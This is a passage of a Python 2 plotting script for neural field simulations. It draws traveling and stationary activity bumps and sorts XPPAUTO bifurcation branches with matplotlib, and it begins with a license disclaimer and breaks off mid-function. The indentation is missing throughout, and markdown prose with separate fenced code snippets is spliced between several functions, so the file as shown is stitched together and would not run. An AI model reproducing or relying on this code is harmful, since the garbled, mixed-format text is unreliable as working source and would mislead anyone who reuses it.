THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# last compiled using python 2.7.6
# numpy version 1.8.2
# scipy version 0.13.3
# matplotlib version 1.3.1
import os
from sys import stdout
import numpy as np
import scipy as sp
import matplotlib
import copy
#from matplotlib.ticker import MultipleLocator
#import matplotlib.ticker as mticker
import matplotlib.colors as colors
from matplotlib import pyplot as plt
import matplotlib.pylab as mp
#import matplotlib.gridspec as gridspec
from mpl_toolkits.mplot3d import proj3d
import matplotlib.gridspec as gridspec
import matplotlib.patches as patches
from mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes
from mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from matplotlib.collections import LineCollection
from mpl_toolkits.mplot3d import axes3d
# 3d plotting is generated in twod_full_square.py, then beautified in this file.
from matplotlib import rc
rc('text', usetex=True)
rc('font', family='serif', serif=['Computer Modern Roman'])
matplotlib.rcParams['text.latex.preamble'] = [r'\boldmath \usepackage{bm} \usepackage{xcolor} \setlength{\parindent}{0pt}']
matplotlib.rcParams.update({'figure.autolayout': True})
sizeOfFont = 20
fontProperties = {'weight' : 'bold', 'size' : sizeOfFont}
from scipy.interpolate import interp1d
import oned_simple
import fourier_2d as f2d
import twod_full as twod
import twod_phase as twodp
from xppy.utils import diagram
from xppcall import xpprun
from generate_figures import beautify_phase
cos = np.cos
sin = np.sin
pi = np.pi;Pi=pi
sqrt = np.sqrt
Sqrt = np.sqrt
exp = np.exp
erfc = sp.special.erfc;Erfc=erfc
erf = sp.special.erf;Erf=erf
E = np.exp(1)#2.7182818284590452353602874713527
cosh = np.cosh;Cosh=cosh
class MyAxes3D(axes3d.Axes3D):
def __init__(self, baseObject, sides_to_draw):
self.__class__ = type(baseObject.__class__.__name__,
(self.__class__, baseObject.__class__),
{})
self.__dict__ = baseObject.__dict__
self.sides_to_draw = list(sides_to_draw)
self.mouse_init()
def set_some_features_visibility(self, visible):
for t in self.w_zaxis.get_ticklines() + self.w_zaxis.get_ticklabels():
t.set_visible(visible)
self.w_zaxis.line.set_visible(visible)
self.w_zaxis.pane.set_visible(visible)
self.w_zaxis.label.set_visible(visible)
def draw(self, renderer):
# set visibility of some features False
self.set_some_features_visibility(False)
# draw the axes
super(MyAxes3D, self).draw(renderer)
# set visibility of some features True.
# This could be adapted to set your features to desired visibility,
# e.g. storing the previous values and restoring the values
self.set_some_features_visibility(True)
zaxis = self.zaxis
draw_grid_old = zaxis.axes._draw_grid
# disable draw grid
zaxis.axes._draw_grid = False
tmp_planes = zaxis._PLANES
if 'l' in self.sides_to_draw :
# draw zaxis on the left side
zaxis._PLANES = (tmp_planes[2], tmp_planes[3],
tmp_planes[0], tmp_planes[1],
tmp_planes[4], tmp_planes[5])
zaxis.draw(renderer)
if 'r' in self.sides_to_draw :
# draw zaxis on the right side
zaxis._PLANES = (tmp_planes[3], tmp_planes[2],
tmp_planes[1], tmp_planes[0],
tmp_planes[4], tmp_planes[5])
zaxis.draw(renderer)
zaxis._PLANES = tmp_planes
# disable draw grid
zaxis.axes._draw_grid = draw_grid_old
def collect_disjoint_branches(diagram,all_sv=True,return_eval=False,sv_tol=.1,remove_isolated=True,isolated_number=2,remove_redundant=True,redundant_threshold=.01,N=20,fix_reverse=True):
"""
collect all disjoint branches into disjoint arrays in a dict.
diagram.dat: all_info.dat from xppauto version 8. currently not compatible with info.dat.
recall the column layout for xpp version 8:
type, branch, 0, par1, par2, period, uhigh[1..n], ulow[1..n], evr[1] evm[1] ... evr[n] evm[n]
yes there is a zero there as of xpp version 8. I don't know why.
for more information on how diagram is organized, see tree.pdf in the xpp source home directory.
all_sv: True or False. in each branch, return all state variables (to be implemented)
return_eval: return eigenvalues (to be implemented)
sv_tol: difference in consecutive state variables. If above this value, break branch.
remove_isolated: True/False. If a branch has fewer than isolated_number of points, do not include.
remove_redundant: if two branches overlap, remove one; overlap means the max diff falls below redundant_threshold.
by default, we keep the branch with the longer arc length.
N: number of points to check for redundancy
fix_reverse: True/False. some branches are computed backwards as a function of the parameter. If so, reverse.
"""
# get number of state variables (both hi and lo values, hence the 2*)
varnum = 2*len(diagram[0,6:])/4
# number of preceding entries (tbparper stands for xpp type, xpp branch, parameter, period)
# diagram[:,6] is the first state variable over all parameter values
# diagram[:,:6] are all the xpp types, xpp branches, parameters, periods for all parameter values
tbparper = 6
# column index of xpp branch type
typeidx = 0
# column index of xpp branch number
bridx = 1
# column index of 0 guy
zeroidx = 2
# column index of bifurcation parameters
par1idx = 3
par2idx = 4
# set up array values for retrieval
c1 = []
c2 = []
c1.append(typeidx)
c1.append(bridx)
c2.append(par1idx)
c2.append(par2idx)
for i in range(varnum):
c2.append(tbparper+i)
c1 = np.array(c1,dtype=int)
c2 = np.array(c2,dtype=int)
# store various branches to dictionary
# this dict is for actual plotting values
val_dict = {}
# this dict is for type and xpp branch values
type_dict = {}
# loop over each coordinate. begin new branch if type, branch change values
# or if parval, period, sv1, sv2, .. svn change discontinuously.
# first set of comparisons is called c1
# second set of comparisons is called c2
brnum = 0
val_dict['br'+str(brnum)] = np.zeros((1,2+varnum)) # branches are named in order they are created
type_dict['br'+str(brnum)] = np.zeros((1,2))
# initialize
c1v_prev = np.array([list(diagram[0,c1])])
c1v = np.array([list(diagram[1,c1])])
c2v_prev = np.array([list(diagram[0,c2])])
c2v = np.array([list(diagram[1,c2])])
# val_dict has entries [par1, par2, sv1hi, sv1lo, ..., svnhi, svnlo]
# type_dict has entries [type, br]
# for a given xpp branch, consecutive terms are appended as a new row
val_dict['br'+str(brnum)] = c2v_prev
type_dict['br'+str(brnum)] = c1v_prev
for i in range(2,len(diagram[:,0])):
# get values for type and branch
c1v_prev = np.array([list(diagram[i-1,c1])])
c1v = np.array([list(diagram[i,c1])])
# get values for svs and parameters
c2v_prev = np.array([list(diagram[i-1,c2])])
c2v = np.array([list(diagram[i,c2])])
# append above values to current branch
val_dict['br'+str(brnum)] = np.append(val_dict['br'+str(brnum)],c2v_prev,axis=0)
type_dict['br'+str(brnum)] = np.append(type_dict['br'+str(brnum)],c1v_prev,axis=0)
# if either above threshold, start new key.
if np.any( np.abs((c1v - c1v_prev))>=1):
brnum += 1
val_dict['br'+str(brnum)] = c2v
type_dict['br'+str(brnum)] = c1v
elif np.any( np.abs((c2v - c2v_prev))>=sv_tol):
brnum += 1
val_dict['br'+str(brnum)] = c2v
type_dict['br'+str(brnum)] = c1v
# remove isolated points
if remove_isolated:
keyvals = val_dict.keys()
for i in range(len(keyvals)):
if len(val_dict[keyvals[i]]) <= isolated_number:
val_dict.pop(keyvals[i])
type_dict.pop(keyvals[i])
# remove redundant branches
# a python branch is removed if it shares multiple points (N) with another xpp branch.
if remove_redundant:
val_dict_final = {}
type_dict_final = {}
# get all xpp branch numbers
brlist = np.unique(diagram[:,1])
# collect all branches for each xpp branch number
keyvals = val_dict.keys()
keyignorelist = []
keysavelist = []
# loop over keys of python branches
for i in range(len(keyvals)):
key = keyvals[i]
if not(key in keyignorelist):
# get xpp branch
xppbrnum = type_dict[key][0,1]
for j in range(i+1,len(keyvals)):
key2 = keyvals[j]
if not(key2 in keyignorelist) and (key2 != key):
# make sure xpp branches are different
if xppbrnum != type_dict[key2][0,1]:
# loop over N different values
belowthresholdcount = 0
dN = len(val_dict[key][:,0])/N
# use a separate index so the outer loop over keys is not clobbered
for n in range(N):
# check if points in val_dict[key] also appear in val_dict[key2]
par1diff = np.amin(np.abs(val_dict[key][dN*n,0]-val_dict[key2][:,0]))
par2diff = np.amin(np.abs(val_dict[key][dN*n,1]-val_dict[key2][:,1]))
sv1diff = np.amin(np.abs(val_dict[key][dN*n,2]-val_dict[key2][:,2]))
sv2diff = np.amin(np.abs(val_dict[key][dN*n,3]-val_dict[key2][:,3]))
diff1 = par1diff + par2diff + sv1diff + sv2diff
if diff1 <= redundant_threshold:
#print 'delete', key2
belowthresholdcount += 1
if belowthresholdcount >= 4:
keyignorelist.append(key2)
#print 'del', key2
else:
if not(key2 in keysavelist):
#print 'keep', key2
val_dict_final[key2] = val_dict[key2]
type_dict_final[key2] = type_dict[key2]
keysavelist.append(key2)
for key in keyignorelist:
if key in keysavelist:
val_dict_final.pop(key)
type_dict_final.pop(key)
else:
val_dict_final = val_dict
type_dict_final = type_dict
if fix_reverse:
for key in val_dict_final.keys():
if val_dict_final[key][2,0] - val_dict_final[key][1,0] < 0:
for i in range(varnum):
val_dict_final[key][:,i] = val_dict_final[key][:,i][::-1]
return val_dict_final, type_dict_final
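The branch-splitting rule used above (start a new branch whenever consecutive rows jump by at least a tolerance) can be sketched compactly with numpy; `split_on_jumps` is a hypothetical helper introduced here for illustration, not part of the original code:

```python
import numpy as np

def split_on_jumps(arr, tol):
    # rows where any column jumps by >= tol between consecutive samples
    jumps = np.where(np.any(np.abs(np.diff(arr, axis=0)) >= tol, axis=1))[0]
    # split into contiguous segments just after each jump
    return np.split(arr, jumps + 1)
```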
def collect(x,y,use_nonan=True,lwstart=1.,lwend=5.,zorder=1.,cmapmax=1.,cmapmin=0.):
"""
add desired line properties
"""
x = np.real(x)
y = np.real(y)
x_nonan = x[(~np.isnan(x))*(~np.isnan(y))]
y_nonan = y[(~np.isnan(x))*(~np.isnan(y))]
if use_nonan:
points = np.array([x_nonan, y_nonan]).T.reshape(-1, 1, 2)
else:
points = np.array([x, y]).T.reshape(-1, 1, 2)
lwidths = np.linspace(lwstart,lwend,len(x_nonan))
cmap = plt.get_cmap('copper')
#my_cmap = truncate_colormap(cmap,gshift/ga[-1],cmapmax)
my_cmap = truncate_colormap(cmap,cmapmin,cmapmax)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, linewidths=lwidths,cmap=my_cmap, norm=plt.Normalize(0.0, 1.0),zorder=zorder)
#points = np.array([x, y]).T.reshape(-1, 1, 2)
#segments = np.concatenate([points[:-1], points[1:]], axis=1)
#lc = LineCollection(segments, cmap=plt.get_cmap('copper'),
# linewidths=1+np.linspace(0,1,len(x)-1)
# #norm=plt.Normalize(0, 1)
#)
lc.set_array(np.sqrt(x**2+y**2))
#lc.set_array(y)
return lc
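The points-to-segments reshape inside `collect` pairs each point with its successor, so the LineCollection can give every segment its own width and color; a minimal numpy-only illustration of that step:

```python
import numpy as np

x = np.array([0., 1., 2.])
y = np.array([0., 1., 0.])
points = np.array([x, y]).T.reshape(-1, 1, 2)                  # shape (3, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)   # shape (2, 2, 2)
# segments[i] holds the endpoints (x_i, y_i) and (x_{i+1}, y_{i+1})
```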
def collect3d(v1a,ga,v2a,use_nonan=True):
"""
set desired line properties
"""
v1a = np.real(v1a)
ga = np.real(ga)
v2a = np.real(v2a)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
if use_nonan:
sol = np.zeros((len(ga_nonan),3))
sol[:,0] = v1a_nonan
sol[:,1] = ga_nonan
sol[:,2] = v2a_nonan
else:
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v1a_nonan)/(.001+np.amax(v1a_nonan))*6.),colors='k',norm=plt.Normalize(0.0, 1.0))
return line3d
def collect3d_colorgrad(v1a,ga,v2a,use_nonan=True,lwstart=1.,lwend=5.,zorder=1.,cmapmin=0.,cmapmax=1.):
"""
set desired line properties. with color gradient. and width denotes g value
"""
v1a = np.real(v1a)
ga = np.real(ga)
v2a = np.real(v2a)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
if use_nonan:
sol = np.zeros((len(ga_nonan),3))
sol[:,0] = v1a_nonan
sol[:,1] = ga_nonan
sol[:,2] = v2a_nonan
else:
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
# shift width and colormap
#lwidths = (1.+(ga_nonan-gshift)/(.001+np.amax(ga_nonan-gshift))*lwfactor)
lwidths = np.linspace(lwstart,lwend,len(ga_nonan))
cmap = plt.get_cmap('copper')
#my_cmap = truncate_colormap(cmap,gshift/ga[-1],cmapmax)
my_cmap = truncate_colormap(cmap,cmapmin,cmapmax)
line3d = Line3DCollection(segs,linewidths=lwidths,
cmap=my_cmap,zorder=zorder)
line3d.set_array(ga_nonan)
return line3d
def clean(x,y,smallscale=False,tol=.5):
if smallscale:
tol = .5
pos = np.where(np.abs(np.diff(y)) >= tol)[0]
pos2 = np.where(np.abs(np.diff(x)) >= tol)[0]
x[pos] = np.nan
y[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
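`clean` relies on matplotlib skipping NaN samples: inserting NaN at large jumps breaks the plotted line there instead of drawing a wrap-around artifact. A self-contained illustration of that masking step:

```python
import numpy as np

y = np.array([3.0, 3.1, -3.1, -3.0])          # wraps from +pi-ish to -pi-ish
pos = np.where(np.abs(np.diff(y)) >= 0.5)[0]  # index just before each jump
y_masked = y.copy()
y_masked[pos] = np.nan                        # plotted line breaks at the wrap
```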
def clean3d(x,y,z,smallscale=False,tol=.5):
if smallscale:
tol = .5
pos = np.where(np.abs(np.diff(y)) >= tol)[0]
pos2 = np.where(np.abs(np.diff(x)) >= tol)[0]
pos3 = np.where(np.abs(np.diff(z)) >= tol)[0]
x[pos] = np.nan
y[pos] = np.nan
z[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
z[pos2] = np.nan
x[pos3] = np.nan
y[pos3] = np.nan
z[pos3] = np.nan
return x,y,z
def remove_redundant(x,y,tol=.01):
pos = np.where(np.abs(np.diff(y)) < tol)[0]
pos2 = np.where(np.abs(np.diff(x)) < tol)[0]
x[pos] = np.nan
y[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
def remove_redundant_x(x,y,tol=.01):
pos = np.where(np.abs(np.diff(x)) < tol)[0]
x[pos] = np.nan
y[pos] = np.nan
return x,y
def remove_redundant_y(x,y,tol=.01):
pos2 = np.where(np.abs(np.diff(y)) < tol)[0]
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
def truncate_colormap(cmap, minval=0.0, maxval=1.0, n=100):
#http://stackoverflow.com/questions/18926031/how-to-extract-a-subset-of-a-colormap-as-a-new-colormap-in-matplotlib
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def unlink_wrap(dat, lims=[-np.pi, np.pi], thresh = 0.95):
# http://stackoverflow.com/questions/27138751/preventing-plot-joining-when-values-wrap-in-matplotlib-plots
"""
Iterate over contiguous regions of `dat` (i.e. where it does not
jump from near one limit to the other).
This function returns an iterator object that yields slice
objects, which index the contiguous portions of `dat`.
This function implicitly assumes that all points in `dat` fall
within `lims`.
"""
jump = np.nonzero(np.abs(np.diff(dat)) > ((lims[1] - lims[0]) * thresh))[0]
lasti = 0
for ind in jump:
yield slice(lasti, ind + 1)
lasti = ind + 1
yield slice(lasti, len(dat))
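A usage-oriented restatement of `unlink_wrap` that returns the slices as a list rather than yielding them; `wrap_slices` is a hypothetical name introduced here for illustration:

```python
import numpy as np

def wrap_slices(dat, lims=(-np.pi, np.pi), thresh=0.95):
    # indices where consecutive samples jump by nearly the full range
    jump = np.nonzero(np.abs(np.diff(dat)) > (lims[1] - lims[0]) * thresh)[0]
    starts = np.concatenate(([0], jump + 1))
    stops = np.concatenate((jump + 1, [len(dat)]))
    return [slice(int(a), int(b)) for a, b in zip(starts, stops)]
```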
def ss_bump_fig():
"""
plot steady-state bumps with arrows to bump peaks
"""
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121)
dat = oned_simple.SimDat()
ax1.set_title(r'\textbf{(a)}',x=0,y=1.02)
ax1.set_xlabel(r'$x$')
ax1.set_ylabel(r'\textbf{Activity}')
ax1.plot(dat.domain-pi,np.roll(dat.u0b(dat.domain),dat.N/2),color='black',lw=3)
# label peak 1d
ax1.scatter(0,np.amax(dat.u0b(dat.domain)),edgecolor='black',facecolor='red',s=80,zorder=3)
ax1.annotate(r'$\theta$', xy=(0, np.amax(dat.u0b(dat.domain))+.02), xycoords='data',
xytext=(0, 30), textcoords='offset points',
arrowprops=dict(arrowstyle="->")
)
# add text to peak
ax1.set_xlim(-pi,pi)
ax1.set_ylim(-1,1)
ax2 = fig.add_subplot(122, projection='3d')
dat = twod.SimDat()
ax2 = twod.plot_s(ax2,dat.u0ss)
# get/label peak 2d
idx = np.argmax(np.reshape(dat.u0ss,dat.N_idx))
peak_z = np.reshape(dat.u0ss,dat.N_idx)[idx]
peak_x = np.reshape(dat.XX,dat.N_idx)[idx]
peak_y = np.reshape(dat.YY,dat.N_idx)[idx]
#ax2.scatter(peak_x+0.,peak_y+0.,peak_z,s=80,edgecolor='black',facecolor='white',zorder=1)
ax2.plot([peak_x,peak_x],[peak_y,peak_y],[peak_z,peak_z+.01],marker='o',markersize=8,markeredgecolor='black',markerfacecolor='red',color='red',zorder=1)
# http://stackoverflow.com/questions/10374930/matplotlib-annotating-a-3d-scatter-plot
x2, y2, _ = proj3d.proj_transform(peak_x,peak_y,peak_z+.14,ax2.get_proj())
ax2.annotate(r'$(\theta_1,\theta_2)$', xy=(x2,y2), xycoords='data',
xytext=(0, 30), textcoords='offset points',
arrowprops=dict(arrowstyle="->")
)
ax2.set_title(r'\textbf{(b)}',x=0,y=1.1)
ax2.set_xlabel(r'$x$')
ax2.set_ylabel(r'$y$')
# add text to peak
plt.tight_layout()
return fig
def oned_const_vel_bump(g=3.5,total=10000):
"""
make figure for traveling bump
"""
dat = oned_simple.SimDat(g=g,q=0,zshift=.1,T=total)
# get four bumps at four equal time intervals. use second half of sim,
# use velocity to determine time intervals
# Peaks of phase plot over time are at pi.
# using second half of solution, subtract -(pi-.8*pi), find index of min
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$x$')
ax.set_ylabel('t')
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax.xaxis.tick_bottom()
ax.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
ax.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,color='.65')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax.set_aspect('auto')
ax.set_xlim(-pi,pi)
ax.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_xticklabels(x_label)
plt.tight_layout()
return fig
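The space-time diagram above is built by imaging the solution array with `matshow`. One detail worth noting: `np.roll` with no `axis` rolls the flattened array, while rolling along `axis=1` recenters each time slice independently. A small sketch of the recentering:

```python
import numpy as np

N = 8
sol = np.tile(np.arange(N), (4, 1))        # stand-in for dat.sol[:, :N]
recentered = np.roll(sol, N // 2, axis=1)  # shift columns by half the domain
```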
def oned_nonconst_vel_bump(g=3.,q=1.,shift=-700,sign=1,total=10000):
"""
make figure for traveling bump
"""
dat = oned_simple.SimDat(g=g,q=q,zshift=.1,T=total)
# period is approx 525 time units
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$x$')
ax.set_ylabel('t')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax.xaxis.tick_bottom()
ax.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax.plot(modsolph[slc],timearr[slc],ls='--',color='.65',lw=2)
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax.set_aspect('auto')
ax.set_xlim(-pi,pi)
ax.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_xticklabels(x_label)
"""
ax.set_title('(b)',x=-.13)
ax.set_xlabel(r'$t$')
ax.set_ylabel(r'$\theta$')
idx_beginning = int(dat.t[-1]/(1.2*dat.dt))
ax.plot(dat.t[idx_beginning:],dat.ph_angle[idx_beginning:],color='black',lw=2)
ax.plot(dat.t[idx_beginning:],-(np.mod(dat.solph[idx_beginning:,0]+pi,2*pi)-pi),color='gray',ls='--',lw=2)
"""
plt.tight_layout()
return fig
def oned_bump_combined():
"""
display all 1d traveling bump figures in one.
"""
fig = plt.figure(figsize=(10,4))
"""
oned_const_vel
#(oned_const_vel_bump,[],['oned_const_vel_bump_fig.pdf']),
"""
#########################################################################################
ax1 = fig.add_subplot(131)
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax1.set_xlabel(r'$x$')
ax1.set_ylabel('$t$')
ax1.set_title(r"\textbf{(a)}",x=0)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax1.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax1.xaxis.tick_bottom()
ax1.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
ax1.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax1.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax1.set_aspect('auto')
ax1.set_xlim(-pi,pi)
ax1.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax1.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax1.set_xticklabels(x_label)
#########################################################################################
"""
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
"""
ax2 = fig.add_subplot(132)
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax2.set_xlabel(r'$x$')
ax2.set_title(r"\textbf{(b)}",x=0)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax2.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax2.xaxis.tick_bottom()
ax2.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax2.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax2.plot(modsolph[slc],timearr[slc],ls='--',lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax2.set_aspect('auto')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_xticklabels(x_label)
#########################################################################################
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = -950
ax3 = fig.add_subplot(133)
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax3.set_xlabel(r'$x$')
ax3.set_title(r"\textbf{(c)}",x=0)
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax3.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax3.xaxis.tick_bottom()
ax3.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax3.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
